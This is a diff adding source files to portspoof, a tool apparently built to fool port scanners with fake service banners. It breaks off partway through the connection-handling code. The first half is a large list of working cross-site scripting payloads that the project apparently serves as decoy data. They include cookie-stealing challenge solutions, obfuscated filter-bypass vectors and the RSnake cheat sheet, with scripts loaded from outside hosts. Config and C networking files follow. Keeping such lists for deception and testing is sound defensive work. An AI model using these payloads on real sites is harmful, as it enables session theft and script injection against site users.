+<iframe src=%22404%22 onload=%22top.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
+<script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__('type', function() {get = arguments.callee.caller.arguments.callee;return 'click';});var _alert = alert;alert = function() { alert = _alert };x.apply(null, a);(function() {arguments.__defineGetter__('0', function() { return a.pop(); });alert(get());})();};safe123.click();</script>#
+<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
+<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>
+<textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open('GET'%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520alert(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)'%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;) autofocus></textarea>
+<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
+<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>
+<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe id=iframe src=%22javascript:parent.x(window)%22><iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
+<textarea id=ta onfocus=%22write('<script>alert(1)</script>')%22 autofocus></textarea>
+<object data=%22data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=%22>
+<script>function x(window) { eval(location.hash.substr(1)) }; open(%22javascript:opener.x(window)%22)</script>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
+%3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{alert%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E
+<iframe src=`http://xssme.html5sec.org/?xss=<iframe onload=%22xhr=new XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`>
+<a target="x" href="xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{alert%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E
+<a target="x" href="xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe>
+<a target="x" href="xssme?xss=<script>find('cookie'); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate('//script/text()', doc, nsResolver, 0, null); alert(result.iterateNext().data.match(/cookie = '(.*?)'/)[1])</script>
+<a target="x" href="xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', '.', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
+Garethy Salty Method!<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(), 'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script>
+<a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
+<div onmouseover='alert&lpar;1&rpar;'>DIV</div>
+<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
+<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
+<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> ?
+<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">?
+<var onmouseover="prompt(1)">On Mouse Over</var>?
+<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>
+<img src="/" =_=" title="onerror='prompt(1)'">
+<%<!--'%><script>alert(1);</script -->
+<script src="data:text/javascript,alert(1)"></script>
+<iframe/src \/\/onload = prompt(1)
+<iframe/onreadystatechange=alert(1)
+<svg/onload=alert(1)
+<input value=<><iframe/src=javascript:confirm(1)
+<input type="text" value=``<div/onmouseover='alert(1)'>X</div>
+http://www.<script>alert(1)</script .com
+<iframe  src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> ?
+<svg><script ?>alert(1)
+<iframe  src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
+<img src=`xx:xx`onerror=alert(1)>
+<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
+<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>?
+<math><a xlink:href="//jsfiddle.net/t846h/">click
+<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>?
+<svg contentScriptType=text/vbs><script>MsgBox+1
+<a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a
+<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
+<script>~'\u0061' ;  \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073.  \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
+<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
+<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script ????????????
+<object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>
+<script>+-+-1-+-+alert(1)</script>
+<body/onload=&lt;!--&gt;&#10alert(1)>
+<script itworksinallbrowsers>/*<script* */alert(1)</script ?
+<img src ?itworksonchrome?\/onerror = alert(1)???
+<svg><script>//&NewLine;confirm(1);</script </svg>
+<svg><script onlypossibleinopera:-)> alert(1)
+<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa  aaaaaaaaa aaaaaaaaaa  href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
+<script x> alert(1) </script 1=2
+<div/onmouseover='alert(1)'> style="x:">
+<--`<img/src=` onerror=alert(1)> --!>
+<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> ?
+<div  style="position:absolute;top:0;left:0;width:100%;height:100%"  onmouseover="prompt(1)" onclick="alert(1)">x</button>?
+"><img src=x onerror=window.open('https://www.google.com/');>
+<form><button formaction=javascript&colon;alert(1)>CLICKME
+<math><a xlink:href="//jsfiddle.net/t846h/">click
+<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>?
+<iframe  src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
+<a  href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click  Me</a>
+"><img src=x onerror=prompt(1);>
+# credit to rsnake
+<SCRIPT>alert('XSS');</SCRIPT>
+'';!--"<XSS>=&{()}
+<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
+<IMG SRC="javascript:alert('XSS');">
+<IMG SRC=javascript:alert('XSS')>
+<IMG SRC=JaVaScRiPt:alert('XSS')>
+<IMG SRC=javascript:alert(&quot;XSS&quot;)>
+<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
+<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
+SRC=&#10<IMG 6;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
+<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
+<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
+<IMG SRC="jav	ascript:alert('XSS');">
+<IMG SRC="jav&#x09;ascript:alert('XSS');">
+<IMG SRC="jav&#x0A;ascript:alert('XSS');">
+<IMG SRC="jav&#x0D;ascript:alert('XSS');">
+<IMG SRC=" &#14;  javascript:alert('XSS');">
+<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
+<IMG SRC="javascript:alert('XSS')"
+<SCRIPT>a=/XSS/
+\";alert('XSS');//
+<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
+<BODY BACKGROUND="javascript:alert('XSS')">
+<BODY ONLOAD=alert('XSS')>
+<IMG DYNSRC="javascript:alert('XSS')">
+<IMG LOWSRC="javascript:alert('XSS')">
+<BGSOUND SRC="javascript:alert('XSS');">
+<BR SIZE="&{alert('XSS')}">
+<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
+<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
+<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
+<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
+<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
+<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
+<IMG SRC='vbscript:msgbox("XSS")'>
+<IMG SRC="mocha:[code]">
+<IMG SRC="livescript:[code]">
+<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
+<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
+<META HTTP-EQUIV="Link" Content="<javascript:alert('XSS')>; REL=stylesheet">
+<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
+<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
+<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
+<TABLE BACKGROUND="javascript:alert('XSS')">
+<DIV STYLE="background-image: url(javascript:alert('XSS'))">
+<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
+<DIV STYLE="width: expression(alert('XSS'));">
+<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
+<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
+<XSS STYLE="xss:expression(alert('XSS'))">
+exp/*<XSS STYLE='no\xss:noxss("*//*");
+<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
+<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
+<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
+<BASE HREF="javascript:alert('XSS');//">
+<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
+<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
+getURL("javascript:alert('XSS')")
+a="get";
+<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<![CDATA[cript:alert('XSS');">
+<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>
+<HTML><BODY>
+<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
+<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
+<? echo('<SCR)';
+<META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;">
+<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
+<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>

src/src/a.out.dSYM/Contents/Info.plist

@@ -0,0 +1,20 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+<plist version="1.0">
+	<dict>
+		<key>CFBundleDevelopmentRegion</key>
+		<string>English</string>
+		<key>CFBundleIdentifier</key>
+		<string>com.apple.xcode.dsym.a.out</string>
+		<key>CFBundleInfoDictionaryVersion</key>
+		<string>6.0</string>
+		<key>CFBundlePackageType</key>
+		<string>dSYM</string>
+		<key>CFBundleSignature</key>
+		<string>????</string>
+		<key>CFBundleShortVersionString</key>
+		<string>1.0</string>
+		<key>CFBundleVersion</key>
+		<string>1</string>
+	</dict>
+</plist>

src/src/config.h.in

@@ -0,0 +1,116 @@
+/* src/config.h.in.  Generated from configure.in by autoheader.  */
+
+/* Define to 1 if you have the <fcntl.h> header file. */
+#undef HAVE_FCNTL_H
+
+/* Define to 1 if you have the `inet_ntoa' function. */
+#undef HAVE_INET_NTOA
+
+/* Define to 1 if you have the <inttypes.h> header file. */
+#undef HAVE_INTTYPES_H
+
+/* Define to 1 if you have the <limits.h> header file. */
+#undef HAVE_LIMITS_H
+
+/* Define to 1 if your system has a GNU libc compatible `malloc' function, and
+   to 0 otherwise. */
+#undef HAVE_MALLOC
+
+/* Define to 1 if you have the <memory.h> header file. */
+#undef HAVE_MEMORY_H
+
+/* Define to 1 if you have the `memset' function. */
+#undef HAVE_MEMSET
+
+/* Define to 1 if you have the <netdb.h> header file. */
+#undef HAVE_NETDB_H
+
+/* Define to 1 if you have the <netinet/in.h> header file. */
+#undef HAVE_NETINET_IN_H
+
+/* Define to 1 if you have the `socket' function. */
+#undef HAVE_SOCKET
+
+/* Define to 1 if you have the <stdint.h> header file. */
+#undef HAVE_STDINT_H
+
+/* Define to 1 if you have the <stdlib.h> header file. */
+#undef HAVE_STDLIB_H
+
+/* Define to 1 if you have the <strings.h> header file. */
+#undef HAVE_STRINGS_H
+
+/* Define to 1 if you have the <string.h> header file. */
+#undef HAVE_STRING_H
+
+/* Define to 1 if you have the <syslog.h> header file. */
+#undef HAVE_SYSLOG_H
+
+/* Define to 1 if you have the <sys/ioctl.h> header file. */
+#undef HAVE_SYS_IOCTL_H
+
+/* Define to 1 if you have the <sys/socket.h> header file. */
+#undef HAVE_SYS_SOCKET_H
+
+/* Define to 1 if you have the <sys/stat.h> header file. */
+#undef HAVE_SYS_STAT_H
+
+/* Define to 1 if you have the <sys/timeb.h> header file. */
+#undef HAVE_SYS_TIMEB_H
+
+/* Define to 1 if you have the <sys/types.h> header file. */
+#undef HAVE_SYS_TYPES_H
+
+/* Define to 1 if you have <sys/wait.h> that is POSIX.1 compatible. */
+#undef HAVE_SYS_WAIT_H
+
+/* Define to 1 if you have the <unistd.h> header file. */
+#undef HAVE_UNISTD_H
+
+/* This is a Linux system */
+#undef LINUX
+
+/* Define to 1 if your C compiler doesn't accept -c and -o together. */
+#undef NO_MINUS_C_MINUS_O
+
+/* This is an OpenBSD system */
+#undef OPENBSD
+
+/* Name of package */
+#undef PACKAGE
+
+/* Define to the address where bug reports for this package should be sent. */
+#undef PACKAGE_BUGREPORT
+
+/* Define to the full name of this package. */
+#undef PACKAGE_NAME
+
+/* Define to the full name and version of this package. */
+#undef PACKAGE_STRING
+
+/* Define to the one symbol short name of this package. */
+#undef PACKAGE_TARNAME
+
+/* Define to the version of this package. */
+#undef PACKAGE_VERSION
+
+/* This is a BSD system */
+#undef SOMEBSD
+
+/* Define to 1 if you have the ANSI C header files. */
+#undef STDC_HEADERS
+
+/* Version number of package */
+#undef VERSION
+
+/* Use GNU source */
+#undef _GNU_SOURCE
+
+/* Define to empty if `const' does not conform to ANSI C. */
+#undef const
+
+/* Define to rpl_malloc if the replacement function should be used. */
+#undef malloc
+
+/* Define to `unsigned int' if <sys/types.h> does not define. */
+#undef size_t

src/src/config_file.c

@@ -0,0 +1,39 @@
+
+
+
+char * get_substring_value(char* str)
+{
+	int i=0;
+	int soffset=-1,eoffset=-1;
+	for(i;i<strlen(str);i++)
+	{
+		if(str[i]=='"')
+		{
+		
+		if(soffset==-1)
+			soffset=i;
+		else if(eoffset==-1)
+			{
+				eoffset=i;
+				break;
+			}
+		else
+			{
+			printf("Error in configuration file1");
+			exit(1);
+			}
+		}
+	}
+	
+	if(soffset==-1 || eoffset==-1)
+	{
+			printf("Error in configuration file2");
+			exit(1);
+	}
+				
+	char *substr=malloc(eoffset-soffset);
+	memset(substr,0,eoffset-soffset);
+	memcpy(substr,str+soffset+1,eoffset-soffset-1);
+	return substr;	
+}
+

src/src/config_file.h

@@ -0,0 +1,6 @@
+
+
+
+
+int process_config_file(struct signature **arr_lines2,int* signatures,int num_lines, char* config_file);
+char *get_substring_value(char* str);

src/src/connection.cpp

@@ -0,0 +1,257 @@
+/*
+ *   portspoof       Service signature obfucastor 
+ *   Copyright (C) 12012 Piotr Duszyński <piotr[at]duszynski.eu>
+ *
+ *   This program is free software; you can redistribute it and/or modify it
+ *   under the terms of the GNU General Public License as published by the
+ *   Free Software Foundation; either version 2 of the License, or (at your
+ *   option) any later version.
+ * 
+ *   This program is distributed in the hope that it will be useful,
+ *   but WITHOUT ANY WARRANTY; without even the implied warranty of
+ *   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
+ *   See the GNU General Public License for more details.
+ * 
+ *   You should have received a copy of the GNU General Public License along
+ *   with this program; if not, see <http://www.gnu.org/licenses>.
+ * 
+ *   Linking portspoof statically or dynamically with other modules is making
+ *   a combined work based on portspoof. Thus, the terms and conditions of
+ *   the GNU General Public License cover the whole combination.
+ * 
+ *   In addition, as a special exception, the copyright holder of portspoof
+ *   gives you permission to combine portspoof with free software programs or
+ *   libraries that are released under the GNU LGPL. You may copy
+ *   and distribute such a system following the terms of the GNU GPL for
+ *   portspoof and the licenses of the other code concerned.
+ * 
+ *   Note that people who make modified versions of portspoof are not obligated
+ *   to grant this special exception for their modified versions; it is their
+ *   choice whether to do so. The GNU General Public License gives permission
+ *   to release a modified version without this exception; this exception
+ *   also makes it possible to release a modified version which carries
+ *   forward this exception.
+ */
+
+
+
+#include <pthread.h>
+#include <sys/param.h> 
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <sys/ioctl.h>
+#include <time.h> 
+#include "threads.h"
+#include "connection.h"
+#include "log.h"
+#include "Configuration.h"
+
+Thread threads[MAX_THREADS];
+
+
+void nonblock(int sockfd)
+{
+	int opts;
+	opts = fcntl(sockfd, F_GETFL);
+	if(opts < 0)
+	{
+		perror("fcntl(F_GETFL)\n");
+		exit(1);
+	}
+	opts = (opts | O_NONBLOCK);
+	if(fcntl(sockfd, F_SETFL, opts) < 0) 
+	{
+		perror("fcntl(F_SETFL)\n");
+		exit(1);
+	}
+}
+
+void* process_connection(void *arg)
+{
+	int tid =  *((int*)(&arg));
+	//int len;  
+	string str;
+	char buffer;
+	int original_port=DEFAULT_PORT;
+	int n = 0;
+	time_t timestamp;
+	struct sockaddr_in peer_sockaddr;
+	int peer_sockaddr_len=sizeof(struct sockaddr_in);
+	char* msg;
+	
+	while(1) {
+
+		sleep(1);
+		for(int i = 0; i < MAX_CLIENT_PER_THREAD; i++)
+		{
+				
+			if(threads[tid].clients[i] != 0)
+			{
+		     
+				timestamp = time(NULL); 
+				
+				if(configuration->getConfigValue(OPT_NOT_NMAP_SCANNER))
+					n = 1; // just reply...
+				else
+					n = recv(threads[tid].clients[i], &buffer,1, 0);	
+			 		
+			
+				// deal with different recv buffer size
+				if(n == 0){
+				
+					#ifdef OSX
+							original_port = ntohs(peer_sockaddr.sin_port);
+					#else
+					
+					if ( getsockopt (threads[tid].clients[i], SOL_IP, SO_ORIGINAL_DST, (struct sockaddr*)&peer_sockaddr,(socklen_t*) (socklen_t*) &peer_sockaddr_len )){
+								perror("Getsockopt failed");
+								goto close_socket;
+							}
+					else
+					original_port = ntohs(peer_sockaddr.sin_port);
+					
+					#endif
+				
+					//LOG
+					msg=(char*)malloc(MAX_LOG_MSG_LEN);
+					memset(msg,0,MAX_LOG_MSG_LEN);
+					snprintf(msg,MAX_LOG_MSG_LEN,"%d # Port_probe # REMOVING_SOCKET # source_ip:%s # dst_port:%d  \n",(int)timestamp,(char*)inet_ntoa(peer_sockaddr.sin_addr),original_port);//" port:%d src_ip%s\n", original_port,;
+					log_write(msg);
+					free(msg);
+					//
+				
+					close_socket:
+					if(configuration->getConfigValue(OPT_DEBUG))
+					fprintf(stdout,"Thread nr. %d : client %d closed connection\n",tid, threads[tid].clients[i]);
+				
+	        		close(threads[tid].clients[i]);
+				
+					pthread_mutex_lock(&new_connection_mutex);
+					threads[tid].clients[i] = 0;
+					threads[tid].client_count--;
+					pthread_mutex_unlock(&new_connection_mutex);
+				
+				}
+				else if(n < 0){
+
+						
+					if(errno == EAGAIN)
+					{
+						continue; // Nmap NULL probe (no data) -> skip && go to another socket (client)
+					}
+					else if(errno == 104) // Client terminted connection -> get rid of the socket now!
+					{}
+					else
+					fprintf(stdout,"errno: %d\n", errno);    
+					
+					#ifdef OSX
+					
+
+						original_port = ntohs(peer_sockaddr.sin_port);
+					
+					#else
+					
+					if ( getsockopt (threads[tid].clients[i], SOL_IP, SO_ORIGINAL_DST, (struct sockaddr*)&peer_sockaddr,(socklen_t*)  &peer_sockaddr_len )){
+								perror("Getsockopt failed");
+								goto close_socket2;
+							}
+					else
+					original_port = ntohs(peer_sockaddr.sin_port);
+					
+					#endif
+				
+					//LOG
+					msg =(char*)malloc(MAX_LOG_MSG_LEN);
+					memset(msg,0,MAX_LOG_MSG_LEN);
+					snprintf(msg,MAX_LOG_MSG_LEN,"%d # Port_probe # REMOVING_SOCKET # source_ip:%s # dst_port:%d  \n",(int)timestamp,(char*)inet_ntoa(peer_sockaddr.sin_addr),original_port);//" port:%d src_ip%s\n", original_port,;
+					log_write(msg);
+					free(msg);
+					//	
+					
+					close_socket2:
+					close(threads[tid].clients[i]); 			
+					
+					pthread_mutex_lock(&new_connection_mutex);
+					threads[tid].clients[i] = 0;
+					threads[tid].client_count--;
+					pthread_mutex_unlock(&new_connection_mutex);
+					
+				}
+				else
+				{
+					
+				#ifdef OSX
+				//  BSD
+							original_port = ntohs(peer_sockaddr.sin_port);
+				//
+				#else
+				// Linux
+				if ( getsockopt (threads[tid].clients[i], SOL_IP, SO_ORIGINAL_DST, (struct sockaddr*)&peer_sockaddr, (socklen_t*) &peer_sockaddr_len ))
+						perror("Getsockopt failed");
+				original_port = ntohs(peer_sockaddr.sin_port);
+				//
+				#endif
+							  	
+				//LOG
+				char* msg=(char*)malloc(MAX_LOG_MSG_LEN);
+				memset(msg,0,MAX_LOG_MSG_LEN);
+				snprintf(msg,MAX_LOG_MSG_LEN,"%d # Service_probe # SIGNATURE_SEND # source_ip:%s # dst_port:%d  \n",(int)timestamp,(char*)inet_ntoa(peer_sockaddr.sin_addr),original_port);//" port:%d src_ip%s\n", original_port,;
+				log_write(msg);
+				free(msg);
+				//
+			
+			  	if(configuration->getConfigValue(OPT_DEBUG))
+				{
+					fprintf(stdout,"\n---\nThread nr.%d for port %d \n", tid,original_port);
+				}
+			
+				std::vector<char> vectsignature=configuration->mapPort2Signature(original_port);
+			
+				int buffertosendsize=vectsignature.size();
+				char* buffertosend= (char*)malloc(buffertosendsize);
+				
+				for(int j=0; j<buffertosendsize;j++)
+					buffertosend[j]=vectsignature[j];
+					
+			  	if(configuration->getConfigValue(OPT_DEBUG))
+				{
+					
+				
